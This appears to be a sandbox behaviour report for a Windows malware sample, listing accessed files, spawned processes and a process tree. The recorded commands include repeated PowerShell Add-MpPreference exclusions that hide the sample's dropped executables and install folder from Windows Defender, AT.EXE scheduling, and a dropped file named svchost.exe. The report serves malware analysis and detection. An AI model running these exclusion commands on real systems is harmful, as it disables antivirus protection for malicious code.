C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\SYSTEMCERTIFICATES\MY\CERTIFICATES
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\SYSTEMCERTIFICATES\MY\CRLS
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\SYSTEMCERTIFICATES\MY\CTLS
C:\WINDOWS\SYSWOW64\GPAPI.DLL
C:\WINDOWS\SYSWOW64\EN-US\CRYPT32.DLL.MUI
C:\WINDOWS\SYSWOW64\NCRYPT.DLL
C:\WINDOWS\SYSWOW64\BCRYPT.DLL
C:\WINDOWS\SYSWOW64\BCRYPTPRIMITIVES.DLL
C:\USERS\ADMINI~1\APPDATA\LOCAL\TEMP\UPDATE-ASSETS.ZIP
C:\PROGRAM FILES (X86)\PUBLICGAMING\APPSETUP.EXE
C:\PROGRAM FILES (X86)\PUBLICGAMING\PRUN.EXE
C:\USERS\ADMINI~1\APPDATA\LOCAL\TEMP\P3.EXE
C:\WINDOWS\SYSWOW64\DWMAPI.DLL
C:\WINDOWS\FONTS\STATICCACHE.DAT
C:\WINDOWS\SYSWOW64\OLE32.DLL
C:\WINDOWS\SYSWOW64\EN-US\MSCTF.DLL.MUI
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\ZOLLBYVRLZOLVDRSHN\AVRAI.VSS
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\ZOLLBYVRLZOLVDRSHN\FIMO.VSS
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\ZOLLBYVRLZOLVDRSHN\ORA.VSS
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\ZOLLBYVRLZOLVDRSHN\VENIR.VSS
C:\WINDOWS\SYSWOW64\IEFRAME.DLL
C:\WINDOWS\SYSWOW64\OLEACC.DLL
C:\WINDOWS\SYSWOW64\OLEACCRC.DLL
C:\WINDOWS\SYSWOW64\EN-US\PROPSYS.DLL.MUI
C:\WINDOWS\SYSWOW64\AT.EXE
C:\WINDOWS\SYSWOW64\SCHEDCLI.DLL
C:\WINDOWS\SYSWOW64\EN-US\AT.EXE.MUI
C:\WINDOWS\SYSWOW64\NETMSG.DLL
C:\WINDOWS\SYSWOW64\CREDSSP.DLL
C:\WINDOWS\SYSWOW64\MSV1_0.DLL
C:\WINDOWS\SYSWOW64\CRYPTDLL.DLL
C:\WINDOWS\SYSWOW64\EN-US\NETMSG.DLL.MUI
C:\WINDOWS\BRANDING\BASEBRD\BASEBRD.DLL
C:\WINDOWS\BRANDING\BASEBRD\EN-US\BASEBRD.DLL.MUI
C:\USERS\ADMINI~1\APPDATA\LOCAL\TEMP\KARA.EXE
C:\WINDOWS\SYSWOW64\NTVDM64.DLL
C:\USERS\ADMINI~1\APPDATA\LOCAL\TEMP\1.EXE
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.VISUALBAS#\08D608378AA405ADC844F3CF36974B8C\MICROSOFT.VISUALBASIC.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.VISUALBASIC\8.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.DRAWING\DBFE8642A8ED7B2B103AD28E0C96418A\SYSTEM.DRAWING.NI.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.WINDOWS.FORMS\3AFCD5168C7A6CB02EAB99D7FD71E102\SYSTEM.WINDOWS.FORMS.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.WINDOWS.FORMS\2.0.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.DRAWING\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\VBC.EXE
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\TEMP\SVCHOST.EXE
C:\USERS\ADMINI~1\APPDATA\LOCAL\TEMP\SVCHOST.EXE
C:\WINDOWS\SYSWOW64\NETAPI32.DLL
C:\WINDOWS\SYSWOW64\WKSCLI.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.CONFIGURATION\BC09AD2D49D8535371845CD7532F9271\SYSTEM.CONFIGURATION.NI.DLL
C:\WINDOWS\SYSWOW64\DSROLE.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.CONFIGURATION\2.0.0.0__B03F5F7F11D50A3A
C:\USERS\ADMINI~1\APPDATA\LOCAL\TEMP\JHUIMME.EXE
C:\WINDOWS\SYSWOW64\WININET.DLL
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\TEMPORARY INTERNET FILES\CONTENT.IE5\INDEX.DAT
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\COOKIES\INDEX.DAT
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\HISTORY\HISTORY.IE5\INDEX.DAT
C:\WINDOWS\SYSWOW64\RASAPI32.DLL
C:\WINDOWS\SYSWOW64\RASMAN.DLL
C:\WINDOWS\SYSWOW64\RTUTILS.DLL
C:\WINDOWS\SYSWOW64\SENSAPI.DLL
C:\WINDOWS\SYSWOW64\NLAAPI.DLL
C:\WINDOWS\SYSWOW64\NAPINSP.DLL
C:\WINDOWS\SYSWOW64\PNRPNSP.DLL
C:\WINDOWS\SYSWOW64\WINRNR.DLL
C:\WINDOWS\SYSWOW64\NETPROFM.DLL
C:\WINDOWS\SYSWOW64\RPCRTREMOTE.DLL
C:\WINDOWS\SYSWOW64\NPMPROXY.DLL
C:\WINDOWS\SYSWOW64\DHCPCSVC.DLL
C:\WINDOWS\SYSWOW64\DHCPCSVC6.DLL
C:\WINDOWS\SYSTEM32\IMM32.DLL
C:\WINDOWS\SYSTEM32\RPCSS.DLL
C:\WINDOWS\SYSTEM32\CRYPTBASE.DLL
C:\WINDOWS\SYSTEM32\UXTHEME.DLL
C:\WINDOWS\SYSTEM32\SECHOST.DLL
C:\WINDOWS\SYSTEM32\AUTHUI.DLL
C:\WINDOWS\SYSTEM32\CRYPTUI.DLL
C:\WINDOWS\WINSXS\AMD64_MICROSOFT.WINDOWS.COMMON-CONTROLS_6595B64144CCF1DF_6.0.7601.17514_NONE_FA396087175AC9AC\COMCTL32.DLL
C:\WINDOWS\WINSXS\AMD64_MICROSOFT.WINDOWS.GDIPLUS_6595B64144CCF1DF_1.1.7601.17514_NONE_2B24536C71ED437A\GDIPLUS.DLL
C:\WINDOWS\SYSTEM32\DUI70.DLL
C:\WINDOWS\SYSTEM32\DUSER.DLL
C:\WINDOWS\SYSTEM32\EN-US\AUTHUI.DLL.MUI
C:\WINDOWS\SYSTEM32\SNDVOLSSO.DLL
C:\WINDOWS\SYSTEM32\HID.DLL
C:\WINDOWS\SYSTEM32\MMDEVAPI.DLL
C:\WINDOWS\SYSTEM32\PROPSYS.DLL
C:\WINDOWS\SYSTEM32\EN-US\SETUPAPI.DLL.MUI
C:\WINDOWS\SYSTEM32\DWMAPI.DLL
C:\WINDOWS\SYSTEM32\XMLLITE.DLL
C:\WINDOWS\SYSTEM32\IMAGERES.DLL
C:\WINDOWS\SYSTEM32\WINDOWSCODECS.DLL
C:\WINDOWS\SYSTEM32\WINBRAND.DLL
C:\WINDOWS\SYSTEM32\WTSAPI32.DLL
C:\WINDOWS\SYSTEM32\WINSTA.DLL
C:\WINDOWS\SYSTEM32\VAULTCREDPROVIDER.DLL
C:\WINDOWS\SYSTEM32\SMARTCARDCREDENTIALPROVIDER.DLL
C:\WINDOWS\SYSTEM32\RPCRTREMOTE.DLL
C:\WINDOWS\SYSTEM32\BIOCREDPROV.DLL
C:\WINDOWS\SYSTEM32\SECUR32.DLL
C:\WINDOWS\SYSTEM32\SSPICLI.DLL
C:\WINDOWS\SYSTEM32\WINBIO.DLL
C:\WINDOWS\SYSTEM32\CREDUI.DLL
C:\WINDOWS\SYSTEM32\VAULTCLI.DLL
C:\WINDOWS\SYSTEM32\NETAPI32.DLL
C:\WINDOWS\SYSTEM32\NETUTILS.DLL
C:\WINDOWS\SYSTEM32\SRVCLI.DLL
C:\WINDOWS\SYSTEM32\WKSCLI.DLL
C:\WINDOWS\SYSTEM32\SAMCLI.DLL
C:\WINDOWS\WIN.INI
C:\WINDOWS\SYSTEM32\CERTCREDPROVIDER.DLL
C:\WINDOWS\SYSTEM32\RASPLAP.DLL
C:\WINDOWS\SYSTEM32\RASAPI32.DLL
C:\WINDOWS\SYSTEM32\RASMAN.DLL
C:\WINDOWS\SYSTEM32\RTUTILS.DLL
C:\WINDOWS\SYSTEM32\CRYPTSP.DLL
C:\WINDOWS\SYSTEM32\RSAENH.DLL
C:\WINDOWS\SYSTEM32\INPUT.DLL
C:\WINDOWS\SYSTEM32\EN-US\INPUT.DLL.MUI
C:\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\INK\TIPTSF.DLL
C:\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\INK\EN-US\TIPTSF.DLL.MUI
C:\WINDOWS\IME\SPTIP.DLL
C:\WINDOWS\IME\EN-US\SPTIP.DLL.MUI
C:\PROGRAM FILES\WINDOWS NT\TABLETEXTSERVICE\TABLETEXTSERVICE.DLL
C:\PROGRAM FILES\WINDOWS NT\TABLETEXTSERVICE\EN-US\TABLETEXTSERVICE.DLL.MUI
C:\WINDOWS\SYSTEM32\EN-US\KERNELBASE.DLL.MUI
C:\WINDOWS\SYSTEM32\EN-US\MSCTF.DLL.MUI
C:\WINDOWS\SYSTEM32\OLEACC.DLL
C:\WINDOWS\SYSTEM32\OLEACCRC.DLL
C:\WINDOWS\SYSTEM32\UIAUTOMATIONCORE.DLL
C:\WINDOWS\SYSTEM32\SXS.DLL
C:\WINDOWS\SYSTEM32\EN-US\IMAGERES.DLL.MUI
C:\WINDOWS\SYSTEM32\TQUERY.DLL
C:\WINDOWS\SYSTEM32\MSSHOOKS.DLL
C:\WINDOWS\SYSTEM32\MSCOREE.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\MSCOREEI.DLL
C:\WINDOWS\SYSTEM32\MSSPRXY.DLL
C:\WINDOWS\SYSTEM32\EN-US\RUNDLL32.EXE.MUI
C:\WINDOWS\SYSTEM32\DFDTS.DLL
C:\WINDOWS\SYSTEM32\RUNDLL32.EXE
C:\WINDOWS\SYSTEM32\WDI.DLL
Process Created
PUBLICGAMING'"
Time offset
["1.690616", "1.439804"]
POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'APPSETUP.EXE'"
Time offset
["1.690616"]
CMD.EXE "/C POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'APPSETUP.EXE'"
Time offset
["1.476406"]
POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'PRUN.EXE'"
Time offset
["1.973024"]
CMD.EXE "/C POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'PRUN.EXE'"
Time offset
["1.571611"]
POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P1.EXE'"
Time offset
["2.583254"]
CMD.EXE "/C POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P1.EXE'"
Time offset
["2.040827"]
POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P2.EXE'"
Time offset
["2.722261"]
CMD.EXE "/C POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P2.EXE'"
Time offset
["2.32324"]
POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P3.EXE'"
Time offset
["4.239349"]
CMD.EXE "/C POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P3.EXE'"
Time offset
["2.589254"]
POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P4.EXE'"
Time offset
["4.709959"]
CMD.EXE "/C POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P4.EXE'"
Time offset
["4.383156"]
POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P5.EXE'"
Time offset
["5.300186"]
CMD.EXE "/C POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P5.EXE'"
Time offset
["4.726957"]
POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P6.EXE'"
Time offset
["5.908586"]
CMD.EXE "/C POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P6.EXE'"
Time offset
["5.502985"]
POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P7.EXE'"
Time offset
["6.329786"]
CMD.EXE "/C POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P7.EXE'"
Time offset
["6.158186"]
POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P8.EXE'"
Time offset
["6.485786"]
CMD.EXE "/C POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P8.EXE'"
Time offset
["6.345386"]
POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P9.EXE'"
Time offset
["6.438987"]
CMD.EXE "/C POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P9.EXE'"
Time offset
["6.360986"]
POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P10.EXE'"
Time offset
["6.485786"]
CMD.EXE "/C POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPROCESS 'P10.EXE'"
Time offset
["6.392187"]
APPSETUP.EXE"
Time offset
["48.065084"]
AT.EXE"
Time offset
["72.834743"]
CMD.EXE
Time offset
["72.975143"]
CMD.EXE < FIMO.VSS
Time offset
["72.928343"]
P3.EXE
Time offset
["72.382341"]
SVCHOST.EXE
Time offset
["110.74621"]
1.EXE
Time offset
["110.527811"]
PRUN.EXE"
Time offset
["49.940695", "48.153887"]
"C:/MALWARE/1BCEB4E84115EABB8BF3DF704B5CC014834CA08B126451AE95D60A968E66D666.EXE"
Time offset
["1.232401", "0.0"]
Process Tree
412
Image path
"C:/MALWARE/1BCEB4E84115EABB8BF3DF704B5CC014834CA08B126451AE95D60A968E66D666.EXE"
Time lapse
0.0
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\VERSION.DLL
C:\WINDOWS\SYSWOW64\MSIMG32.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\NTDLL.DLL
C:\WINDOWS\SYSWOW64\KERNEL32.DLL
C:\MALWARE\1BCEB4E84115EABB8BF3DF704B5CC014834CA08B126451AE95D60A968E66D666.EXE
C:\WINDOWS\SYSWOW64\APPHELP.DLL
Process children
2200
Image path
"C:/MALWARE/1BCEB4E84115EABB8BF3DF704B5CC014834CA08B126451AE95D60A968E66D666.EXE"
Time lapse
1.232401
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\ADVAPI32.DLL
C:\WINDOWS\SYSWOW64\NTDLL.DLL
C:\WINDOWS\SYSWOW64\WINMM.DLL
C:\WINDOWS\SYSWOW64\WS2_32.DLL
C:\WINDOWS\SYSWOW64\POWRPROF.DLL
C:\WINDOWS\SYSWOW64\EN-US\SETUPAPI.DLL.MUI
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\WSHTCPIP.DLL
C:\WINDOWS\SYSWOW64\EN-US\WSHTCPIP.DLL.MUI
C:\WINDOWS\SYSWOW64\WSHIP6.DLL
C:\WINDOWS\SYSWOW64\EN-US\WSHIP6.DLL.MUI
C:\WINDOWS\SYSWOW64\WSHQOS.DLL
C:\WINDOWS\SYSWOW64\EN-US\WSHQOS.DLL.MUI
C:\WINDOWS\SYSWOW64\CMD.EXE
C:\WINDOWS\SYSWOW64\APPHELP.DLL
C:\WINDOWS\APPPATCH\SYSMAIN.SDB
C:\WINDOWS\SYSWOW64\MSWSOCK.DLL
C:\WINDOWS\SYSWOW64\DNSAPI.DLL
C:\WINDOWS\SYSWOW64\IPHLPAPI.DLL
C:\WINDOWS\SYSWOW64\WINNSI.DLL
C:\WINDOWS\SYSWOW64\RASADHLP.DLL
C:\WINDOWS\SYSWOW64\FWPUCLNT.DLL
C:\WINDOWS\SYSWOW64\CRYPTSP.DLL
C:\WINDOWS\SYSWOW64\RSAENH.DLL
C:\WINDOWS\SYSWOW64\CRYPT32.DLL
C:\WINDOWS\SYSWOW64\USERENV.DLL
C:\WINDOWS\SYSWOW64\PROFAPI.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\SYSTEMCERTIFICATES\MY\CERTIFICATES
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\SYSTEMCERTIFICATES\MY\CRLS
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\SYSTEMCERTIFICATES\MY\CTLS
C:\WINDOWS\SYSWOW64\GPAPI.DLL
C:\WINDOWS\SYSWOW64\EN-US\CRYPT32.DLL.MUI
C:\WINDOWS\SYSWOW64\NCRYPT.DLL
C:\WINDOWS\SYSWOW64\BCRYPT.DLL
C:\WINDOWS\SYSWOW64\BCRYPTPRIMITIVES.DLL
C:\USERS\ADMINI~1\APPDATA\LOCAL\TEMP\UPDATE-ASSETS.ZIP
C:\WINDOWS\SYSWOW64\KERNEL32.DLL
C:\PROGRAM FILES (X86)\PUBLICGAMING\APPSETUP.EXE
C:\PROGRAM FILES (X86)\PUBLICGAMING\PRUN.EXE
Process children
2268
Image path
CMD.EXE "/C POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPATH 'C:\PROGRAM FILES (X86)\PUBLICGAMING'"
Time lapse
1.439804
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\WINBRAND.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\EN-US\CMD.EXE.MUI
C:\PROGRAM FILES (X86)\COMMON FILES\ORACLE\JAVA\JAVAPATH_TARGET_2162329
C:\WINDOWS\SYSWOW64\WBEM
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE
C:\WINDOWS\SYSWOW64\APPHELP.DLL
C:\WINDOWS\APPPATCH\SYSMAIN.SDB
Process children
1220
Image path
POWERSHELL -COMMAND ADD-MPPREFERENCE -EXCLUSIONPATH 'C:\PROGRAM FILES (X86)\PUBLICGAMING'"
Time lapse
1.690616
Files Accessed
C:\WINDOWS\SYSTEM32\WOW64.DLL
C:\WINDOWS\SYSTEM32\WOW64WIN.DLL
C:\WINDOWS\SYSTEM32\WOW64CPU.DLL
C:\WINDOWS\SYSWOW64\SECHOST.DLL
C:\WINDOWS\SYSWOW64\ATL.DLL
C:\WINDOWS\SYSWOW64\MSCOREE.DLL
C:\WINDOWS\SYSWOW64\IMM32.DLL
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\EN-US\POWERSHELL.EXE.MUI
C:\WINDOWS\SYSWOW64\UXTHEME.DLL
C:\WINDOWS\REGISTRATION\R000000000006.CLB
C:\WINDOWS\SYSWOW64\SHELL32.DLL
C:\WINDOWS\SYSWOW64\USERENV.DLL
C:\WINDOWS\SYSWOW64\PROFAPI.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.WINDOWS.COMMON-CONTROLS_6595B64144CCF1DF_6.0.7601.17514_NONE_41E6975E2BD6F2B2\COMCTL32.DLL
C:\WINDOWS\WINDOWSSHELL.MANIFEST
C:\WINDOWS\GLOBALIZATION\SORTING\SORTDEFAULT.NLS
C:\WINDOWS\SYSWOW64\PROPSYS.DLL
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\CACHES\CVERSIONS.1.DB
C:\WINDOWS\SYSWOW64\EN-US\SETUPAPI.DLL.MUI
C:\WINDOWS\SYSWOW64\NTMARTA.DLL
C:\USERS\ADMINISTRATOR\APPDATA\LOCAL\MICROSOFT\WINDOWS\CACHES\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.VER0X0000000000000001.DB
C:\USERS\DESKTOP.INI
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\DESKTOP.INI
C:\USERS\ADMINISTRATOR\DESKTOP\DESKTOP.INI
C:\WINDOWS\SYSWOW64\EN-US\SHELL32.DLL.MUI
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\DESKTOP.INI
C:\USERS\PUBLIC\DESKTOP.INI
C:\USERS\PUBLIC\DESKTOP\DESKTOP.INI
C:\WINDOWS\SYSWOW64\APPHELP.DLL
C:\WINDOWS\SYSWOW64\GAMEUX.DLL
C:\WINDOWS\APPPATCH\SYSMAIN.SDB
C:\WINDOWS\SYSWOW64\EN-US\GAMEUX.DLL.MUI
C:\WINDOWS\WINSXS\X86_MICROSOFT.WINDOWS.GDIPLUS_6595B64144CCF1DF_1.1.7601.17514_NONE_72D18A4386696C80\GDIPLUS.DLL
C:\WINDOWS\SYSWOW64\XMLLITE.DLL
C:\WINDOWS\SYSWOW64\WER.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\INTERNET EXPLORER\QUICK LAUNCH\DESKTOP.INI
C:\WINDOWS\SYSWOW64\SHDOCVW.DLL
C:\WINDOWS\SYSWOW64\EN-US\SHDOCVW.DLL.MUI
C:\WINDOWS\SYSWOW64\LINKINFO.DLL
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\DESKTOP.INI
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\WINDOWS POWERSHELL\DESKTOP.INI
C:\WINDOWS\SYSWOW64\NTSHRUI.DLL
C:\WINDOWS\SYSWOW64\SRVCLI.DLL
C:\WINDOWS\SYSWOW64\CSCAPI.DLL
C:\WINDOWS\SYSWOW64\SLC.DLL
C:\PROGRAMDATA\MICROSOFT\WINDOWS\START MENU\PROGRAMS\ACCESSORIES\WINDOWS POWERSHELL\WINDOWS POWERSHELL.LNK
C:\WINDOWS\SYSWOW64\WINDOWSPOWERSHELL\V1.0\POWERSHELL_ISE.EXE
C:\WINDOWS\HH.EXE
C:\WINDOWS\SYSWOW64\CRYPTSP.DLL
C:\WINDOWS\SYSWOW64\RSAENH.DLL
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\MCCJNPLYDM9988TJ2P7M.TEMP
C:\USERS\ADMINISTRATOR\APPDATA\ROAMING\MICROSOFT\WINDOWS\RECENT\CUSTOMDESTINATIONS\D93F411851D7C929.CUSTOMDESTINATIONS-MS~RFA83F.TMP
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\MSCOREEI.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORWKS.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CLR.DLL
C:\WINDOWS\WINSXS\X86_MICROSOFT.VC80.CRT_1FC8B3B9A1E18E3B_8.0.50727.4940_NONE_D08CC06A442B34FC\MSVCR80.DLL
C:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CONFIG\MACHINE.CONFIG
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\INDEX149.DAT
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MSCORLIB\62A0B3E4B40EC0E8C5CFAA0C8848E64A\MSCORLIB.NI.DLL
C:\WINDOWS\ASSEMBLY\PUBPOL25.DAT
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM\9E0A3B9B9F457233A335D7FBA8F95419\SYSTEM.NI.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\B1C511D8FAD78AD3C5213B2B4FB02B8B\MICROSOFT.POWERSHELL.CONSOLEHOST.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.CONSOLEHOST\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.MANAGEMENT.AUTOMATION\1.0.0.0__31BF3856AD364E35\SYSTEM.MANAGEMENT.AUTOMATION.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM\2.0.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.MANAGEMENT.A#\4436815B432C313255AF322F4EC3560D\SYSTEM.MANAGEMENT.AUTOMATION.NI.DLL
C:\WINDOWS\SYSWOW64\VERSION.DLL
C:\WINDOWS\SYSWOW64\L_INTL.NLS
C:\WINDOWS\SYSWOW64\EN-US\KERNELBASE.DLL.MUI
C:\WINDOWS\ASSEMBLY\GAC_32\MSCORLIB\2.0.0.0__B77A5C561934E089\SORTTBLS.NLP
C:\WINDOWS\ASSEMBLY\GAC_32\MSCORLIB\2.0.0.0__B77A5C561934E089\SORTKEY.NLP
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.CORE\FBC05B5B05DC6366B02B8E2F77D080F1\SYSTEM.CORE.NI.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\4F68CD04686E5DC5A55070D112D44BDF\MICROSOFT.POWERSHELL.COMMANDS.DIAGNOSTICS.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.DIAGNOSTICS\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.CORE\3.5.0.0__B77A5C561934E089
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.CONFIGURATIO#\F02737C83305687A68C088927A6C5A98\SYSTEM.CONFIGURATION.INSTALL.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\SYSTEM.CONFIGURATION.INSTALL\2.0.0.0__B03F5F7F11D50A3A
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.WSMAN.MAN#\EE28A075665B6BC23B6DAE56903D431D\MICROSOFT.WSMAN.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.WSMAN.MANAGEMENT\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.WSMAN.RUNTIME\1.0.0.0__31BF3856AD364E35\MICROSOFT.WSMAN.RUNTIME.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\SYSTEM.TRANSACTIONS\AD18F93FC713DB2C4B29B25116C13BD8\SYSTEM.TRANSACTIONS.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_32\SYSTEM.TRANSACTIONS\2.0.0.0__B77A5C561934E089\SYSTEM.TRANSACTIONS.DLL
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\3008A05E2928E2C1D856CC34E0422C17\MICROSOFT.POWERSHELL.COMMANDS.UTILITY.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.UTILITY\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\8DF695FB80187F65208D87229E81E8A2\MICROSOFT.POWERSHELL.COMMANDS.MANAGEMENT.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.COMMANDS.MANAGEMENT\1.0.0.0__31BF3856AD364E35
C:\WINDOWS\ASSEMBLY\NATIVEIMAGES_V2.0.50727_32\MICROSOFT.POWERSHEL#\8CE205027E30804D1B2DEAFFA0582735\MICROSOFT.POWERSHELL.SECURITY.NI.DLL
C:\WINDOWS\ASSEMBLY\GAC_MSIL\MICROSOFT.POWERSHELL.SECURITY\1.0.0.0__31BF3856AD364E35
